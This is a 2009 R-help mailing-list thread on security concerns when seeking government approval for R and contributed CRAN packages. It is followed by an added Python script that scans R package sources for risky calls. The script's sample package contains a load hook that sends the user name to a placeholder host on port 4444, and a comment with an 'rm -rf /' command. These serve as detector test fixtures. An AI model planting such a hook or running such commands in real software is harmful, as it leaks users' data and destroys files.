Peterson, Eric B.
2009-Dec-28 18:23 UTC
[R] What might be the security issues from installing R?
I work in a US government office, where regular computer users are not allowed Admin access to their computers, and all software must go through an extensive evaluation to be approved for installation and use. Several of us in my office would greatly benefit from R, so I'd like to request that it go through the approval process. Does anyone out there have any experience or advice to share?

My guess is that we may run into problems due to R being open-source, leading to a potential perception that the code might be poorly controlled. This could be further complicated by the need for downloading additional open-source packages. At present, I am not aware of any open source software that has passed through the approval process, though I am also not aware of any policy against open-source.

Thanks!

---
Eric Peterson, Ph.D.
Data Steward
Trinity River Restoration Program (contracted through SAIC)
530-623-1810
http://www.trrp.net
http://www.saic.com
Marc Schwartz
2009-Dec-28 22:07 UTC
[R] What might be the security issues from installing R?
On Dec 28, 2009, at 12:23 PM, Peterson, Eric B. wrote:

> I work in a US government office, where regular computer users are
> not allowed Admin access to their computers, and all software must
> go through an extensive evaluation to be approved for installation
> and use. Several of us in my office would greatly benefit from R,
> so I'd like to request that it go through the approval process.
> Does anyone out there have any experience or advice to share?
>
> My guess is that we may run into problems due to R being open-
> source, leading to a potential perception that the code might be
> poorly controlled. This could be further complicated by the need for
> downloading additional open-source packages. At present, I am not
> aware of any open source software that has passed through the
> approval process, though I am also not aware of any policy against
> open-source.
>
> Thanks!

Eric,

You might want to review the following document, which discusses R's SDLC, albeit in the context of FDA regulated clinical trials:

http://www.r-project.org/doc/R-FDA.pdf

Note that the above document covers R as distributed by The R Foundation, so does not cover user contributed packages available via CRAN or other means.

If you were to search the R list archives, you will see that there are other U.S. ".gov" e-mail addresses from various organizations that use R, including NOAA, NPS, NIH, EPA, DOC and FRB. There are also many governmental bodies outside the U.S. that use R.

Another issue to be aware of is that since version 2.10.0, R uses dynamically built HTML pages for help. This requires the use of an R-installed local web server, which might conflict with local policies. More information is available in the FAQs:

http://cran.r-project.org/doc/manuals/R-admin.html#Help-options

If you are running Windows, you might be interested in the following:

http://cran.r-project.org/bin/windows/base/rw-FAQ.html#Does-R-run-under-Windows-Vista_003f

and perhaps:

http://cran.r-project.org/bin/windows/base/rw-FAQ.html#The-Internet-download-functions-fail_002e

From a more generic perspective, if your institution is using Linux, Apache, OpenOffice, Firefox or Thunderbird among others, they are already using open source software. The barrier to using open source gets lower all the time.

HTH,

Marc Schwartz
Barry Rowlingson
2009-Dec-28 23:37 UTC
[R] What might be the security issues from installing R?
On Mon, Dec 28, 2009 at 6:23 PM, Peterson, Eric B. <ebpeterson at usbr.gov> wrote:

> My guess is that we may run into problems due to R being open-source, leading to a potential perception that the code might be poorly controlled. This could be further complicated by the need for downloading additional open-source packages. At present, I am not aware of any open source software that has passed through the approval process, though I am also not aware of any policy against open-source.

The 'Core' of R is code committed (and therefore 'controlled') by a smallish group of people:

http://www.r-project.org/contributors.html

The real problem would come when you start adding additional packages from CRAN or R-forge or some other source. These are written by hundreds or possibly thousands of people. I've not heard of any malicious code ever being found in an R package, but maybe one day I'll sneak a back-door server into one of mine and see how long before it gets spotted. I don't think any formal review of CRAN package code is ever done (someone may prove me wrong here, but there's zillions of lines of code in CRAN now).

Barry
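Barry's point, that nobody formally reviews the contributed-package code you pull from CRAN or R-forge, is the one an approval board will actually care about, and it is addressable: a reviewer can triage a package's R sources before it is installed. The script below is an added example written for this thread, not code from any of the posters or from the R project. It is a purely lexical first pass over R source text: it strips comments and string contents (so a `system()` mentioned in a comment or a string is not counted), then reports calls that reach the shell, the network, dynamic code loading or the file system, and flags any that sit inside a package load hook (`.onLoad`, `.onAttach`, `.First.lib`), because those run automatically the moment the package is loaded. The two-file sample package is constructed for the example and the IP address in it is a hypothetical placeholder; the category labels are the reviewer's, not anything R defines.

```python
"""Lexical triage of R package sources for calls a reviewer should read by hand.

Added example for an unaudited CRAN/R-forge package. Not a verdict: a
determined author can hide calls behind do.call(), get() with a built
string, or native code under src/, so treat a clean report as "nothing
obvious", not "safe".
"""
import re
from collections import namedtuple

# Base-R functions worth a manual look, grouped under reviewer-chosen labels.
SUSPICIOUS_CALLS = {
    "shell": {"system", "system2", "shell", "pipe"},
    "network": {"socketConnection", "url", "download.file"},
    "dynamic_code": {"eval", "parse", "source", "dyn.load", "library.dynam"},
    "filesystem": {"file.remove", "unlink", "file.copy"},
}

# Hook functions R runs automatically when a package is loaded or attached.
HOOK_DEF_RE = re.compile(
    r"^\s*(\.onLoad|\.onAttach|\.First\.lib)\s*(<-|=)\s*function", re.M
)
# A call site: an identifier immediately followed by '('. The lookbehind
# stops 'my.system(' from matching as 'system('.
CALL_RE = re.compile(r"(?<![\w.])([A-Za-z.][\w.]*)\s*\(")

Finding = namedtuple("Finding", "file line call category in_load_hook")


def strip_r_comments_and_strings(src):
    """Drop '#' comments and the *contents* of quoted strings.

    Quote characters and newlines are kept so that line numbers and
    brace matching still line up with the original file.
    """
    out, i, n, quote = [], 0, len(src), None
    while i < n:
        c = src[i]
        if quote:
            if c == "\\" and i + 1 < n:  # skip escaped char inside a string
                i += 2
                continue
            if c == quote:
                quote = None
                out.append(c)
            elif c == "\n":
                out.append(c)
            i += 1
            continue
        if c in "\"'":
            quote = c
            out.append(c)
        elif c == "#":
            while i < n and src[i] != "\n":  # comment runs to end of line
                i += 1
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def find_hook_spans(code):
    """Return (hook_name, open_brace_idx, close_brace_idx) for each load hook."""
    spans = []
    for m in HOOK_DEF_RE.finditer(code):
        start = code.find("{", m.end())
        if start < 0:
            continue
        depth = 0
        for j in range(start, len(code)):
            if code[j] == "{":
                depth += 1
            elif code[j] == "}":
                depth -= 1
                if depth == 0:
                    spans.append((m.group(1), start, j))
                    break
    return spans


def triage(files):
    """files: {relative_path: r_source_text}. Returns a list of Finding."""
    findings = []
    for fname, src in files.items():
        code = strip_r_comments_and_strings(src)
        hooks = find_hook_spans(code)
        for m in CALL_RE.finditer(code):
            name = m.group(1)
            category = next(
                (c for c, names in SUSPICIOUS_CALLS.items() if name in names), None
            )
            if category is None:
                continue
            line = code.count("\n", 0, m.start()) + 1
            in_hook = any(s <= m.start() <= e for _, s, e in hooks)
            findings.append(Finding(fname, line, name, category, in_hook))
    return findings


# Constructed sample package (not a real CRAN package); the address is a
# placeholder from the documentation range, not a real host.
SAMPLE_PACKAGE = {
    "R/zzz.R": """\
# load hook that phones home as soon as the package is loaded
.onLoad <- function(libname, pkgname) {
  con <- socketConnection(host = "203.0.113.10", port = 4444)
  writeLines(Sys.getenv("USER"), con)
}
""",
    "R/utils.R": """\
# benign code: system() appears only in a string and a comment
note <- "call system() yourself"   # system("rm -rf /") in a comment
clean_tmp <- function(path) {
  unlink(path, recursive = TRUE)
}
""",
}

if __name__ == "__main__":
    for f in sorted(triage(SAMPLE_PACKAGE), key=lambda f: not f.in_load_hook):
        flag = "LOAD-HOOK " if f.in_load_hook else ""
        print(f"{flag}{f.file}:{f.line}: {f.call}() [{f.category}]")
```

Run against a real package, feed `triage()` the contents of every file under the unpacked tarball's `R/` directory, and read the `src/` directory (C/C++/Fortran) separately, since nothing here looks at native code. Hits inside a load hook deserve the first look; an `unlink()` inside an ordinary cleanup helper is usually what it appears to be.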